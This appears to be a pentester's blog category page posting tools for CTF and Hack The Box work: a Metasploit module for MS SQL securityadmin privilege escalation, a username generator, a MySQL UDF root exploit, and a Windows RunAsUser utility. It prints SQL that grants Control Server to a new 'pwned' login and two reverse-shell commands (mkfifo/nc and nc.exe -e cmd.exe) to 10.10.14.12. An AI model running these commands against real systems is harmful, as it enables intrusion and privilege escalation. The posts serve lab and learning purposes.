Category: Tools & Scripts

Categories
Tools & Scripts

MS SQL Security Admin – Priv Esc

https://github.com/atthacks/mssql-secadmin-privesc

It’s been a while – I have been crazy busy with work and life in general and unfortunately let the blog slip a little. All the plans I want to do are in the pipeline at some point. It’s just a case of finding the time!!

Anyway, today I give you a custom Metasploit module to add to your arsenal. Within MS SQL Server, there is a very easy way to elevate your privileges from the “Security Admin” server role. By default, the “Security Admin” role does not have permission to enable “xp_cmdshell” to allow you to get code execution on the machine. However, you can create new users. The user you create cannot be assigned a permission higher than the “Security Admin” (which makes sense). But what you can do is grant “Control Server” permissions instead.

I won’t go into detail on what the differences between “Control Server vs sysadmin” are here. But rest assured there are plenty of other blogs out there which highlight this / similar issues to what this Metasploit module exploits. With the “Control Server” permissions, you pretty much have the keys to the castle and have the ability to enable “xp_cmdshell” in order to get code execution.

I may be wrong, but I haven’t seen an equivalent Metasploit module for this? Anyway, I’ll just to give you a run down of what the script does:

  • Checks to see if the user has “securityadmin” role.
  • If so, then a new user is created.
  • Control Server permissions assigned to new user.
  • Then you will need to manually log in as your new user and enable xp_cmdshell.

So as you can see it’s straight forward. Installation instructions will be on the Github page.

If you would like to run these steps manually then these will be the steps after logging into SQL Server:

select is_srvrolemember('securityadmin') as IsSecAdmin
create login pwned with password=Password123!, check_policy=off;
grant control server to pwned;

It’s as simple as that.

Anyway, I hope this has helped someone. At some point I may change the script to automatically log in as the new user and then pwn using xp_cmdshell. This is my first go at a custom Metasploit module and I haven’t done a lot of Ruby yet, so it’ll be quite a nice project to continue with when I get the time.

Thanks for reading 🙂

Categories
Tools & Scripts

Ugen – Username Generator

What’s this?

Ugen is the latest script I have added to my GitHub repository. It is nothing spectacular and is just a simple python script to transform a list of “firstname, lastnames” into potential username formats.

I made this script while working on a HTB Windows machine. The box had a webpage showing a list of employees (firstnames and lastnames) and I had no way of quickly and efficiently checking the username format they had chosen.

Names should be entered into a text file in the following format:

firstname,lastname
firstname,lastname
firstname,lastname

Then simply run the tool like this:

python -i userInput.txt -o userOutput.txt -n

The “-n” switch is optional and will append the numbers 1-5 to the end of each username possibility. For example, jbloggs1, jbloggs2 etc.

Typically, you can follow this up and use kerbrute to enumerate the usernames in this list to identify which username format is correct.

kerbrute userenum --dc 10.10.10.120 -d domain.local ugen_list.txt

I have purposely blurred out the usernames and domain names as I hope to have some Windows challenges coming out soon and do not want to reveal any details about what is valid etc.

Anyway, hope someone finds this useful.

🙂

Categories
Tools & Scripts

Privescker

Well I planned to spend the day on HTB – that didn’t happen!

Privescker is a tool I created after experiencing the pain of downloading files to Windows after initially gaining a shell.

I made some changes today as initially I embedded the binaries within privescker.exe. But now I download the zip from the attack machine and extract them all in one go.

Still lots to do and improve this. Got some really cool ideas how to take it further so keep checking back for an update on this one.

I won’t write a long blog for this one as I am shattered and food is almost ready – just check out the GitHub for all the details on how it works https://github.com/atthacks/Privescker

Hope someone finds it helpful. Enjoy 🙂

Categories
Tools & Scripts

Couple of Python Scripts

I haven’t had as much time as I would have hoped to start on some other projects as I would have liked. But I have uploaded two new scripts to my GitHub (https://github.com/atthacks/).

udf_root_py3

https://github.com/atthacks/udf_root_py3

This is a really useful script but unfortunately I cannot take the credit for this one. I have simply changed a few lines to make it Python 3 compatible. The original author d7x (https://twitter.com/d7x_real/) did a great job at automating this MySQL privilege escalation (https://www.exploit-db.com/exploits/1518).

As you can see there are usually a number of manual steps to complete this privesc. However, if you find yourself in a position where you can use this exploit then simply running this script and passing the MySQL username and password will automate the process.

python3 udf_root_py3.py --username root --password rootPassword

You may or may not have success with the root shell it attempts to open for you. In my experience I had to exit the shell it entered me in and return to the mysql instance before using the following commands to execute commands as root.

select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 80 >/tmp/f');

urlencode-list

https://github.com/atthacks/urlencode-list

What is this script?

This was a quick Python script I put together to URL encode / decode lists.

Why did I create it?

This can have a lot of uses not just in pentesting / CTF exercises. The reason I made this in particular was because I was in a situation where I could not use a tool such as sqlmap to detect sql injection and instead of manually testing everything off my sql injection cheatsheet I could automate it with a tool like wfuzz.

Where have I used it?

I recommend checking out bootlesshackers Insanity Hosting machine on Vulnhub for an example box of where this may be useful.

Using Burp Intruder, you can upload a list and there is a tickbox option to automatically URL encode specific characters under Intruder >> Payloads >> Payload Encoding.

Now if you have the Community version of Burp, using Intruder like this can take a long time especially if you have a large list. It is simple enough to recreate the request for wfuzz (or similar) and use the output of this tool as your input file for wfuzz.

Notes

Soon I will be making a post on how to use tools such as wfuzz in order to look for SQL Injection without using a fully automated tool such as sqlmap.

Other ways of doing this?

There are lots of ways / scripts to do this and when you look online there are many encoders / decoders. However, what I found is that they all seem to encode the entire contents into a single line which doesn’t help you if you wanted to use it in an attack like mentioned above.

Anyway I hope someone finds these scripts useful.

🙂

Categories
Tools & Scripts

RunAsUser – Windows CTF Tool

So I have been very busy with work lately among everyday life in these crazy times. Anyway this is just a quick post of a tool I created recently called RunAsUser (https://github.com/atthacks/RunAsUser).

What does it do?

During some CTF exercises I have been in a position where I have a low privilege shell on a machine and have found credentials for either another user or admin. Unlike Linux there isn’t a simple “su” switch user command for Windows.

This tool allows you you provide the credentials you found and execute a given program with arguments (optional).

Is there other ways to do this?

Yes there is. You can fairly easily accomplish this in PowerShell but in my experience and the CTF challenges I have used this tool on – I have usually had limited or no PowerShell access for one reason or another. In a cmd shell you can run applications as another user but again I have experienced issues with this in the past and not worked correctly.

On a lot of these machines there may be another way of utilising the credentials to pivot or escalate such as using them with Evil-WinRm. However in the instance that you are out of options, or as an alternative, this tool can help.

Where have you used it?

Most recently I have used it on HTB boxes JSON and ChatterBox.

On the JSON box, once you have a user shell you can obtain the “superadmin” credentials by decompiling a binary. The credentials are superadmin:funnyhtb. Now although there are other ways to root this particular machine, one avenue you can do it is via RunAsUser.

In the JSON instance I uploaded the RunAsUser.exe binary and then executed the following command.

runasuser.exe -u superadmin -p funnyhtb -f c:\Users\Public\nc.exe -a '10.10.14.12 9001 -e cmd.exe'

The above command worked a treat and I got my reverse shell back as superadmin.

In the ChatterBox machine – this demonstrates another way you can use RunAsUser.

winpeas output

As we can see from from the winPEAS output, it found credentials for Alfred. Now some guides online port forward SMB and then use winexe to connect. Others use PowerShell and go through the process of creating a credential object and then using it with Start-Process to execute a command as that other user. This is how I did it:

RunAsUser

RunAsUser supports command line arguments (shown in JSON example) and if no arguments are supplied it will walkthrough each step with you allowing you to enter them as seen in the picture above.

How does the tool work?

Its a very simple C# application that takes the arguments you supply and creates a process using those arguments supplied. The tool does the job and in the near future I will likely update it and tidy it up a bit.

This isn’t an every day tool but has certainly made my life easier on quite a few boxes now which is why I made it to be honest.

Anyway I hope this can help someone else. I have more tools and scripts I’ll be releasing soon.

Stay safe everyone 🙂

***Edit***

I have updated the GitHub page (https://github.com/atthacks/RunAsUser) to show an example of where “runas” does not work and “RunAsUser” does work. I created this tool for this exact reason. I was on a machine and had credentials and my initial thought was runas, however this would not work and kept skipping over the password prompt. I am aware there are other solutions to do the same thing, but I enjoyed making this quick tool and thought I would share it as it will hopefully be helpful to someone.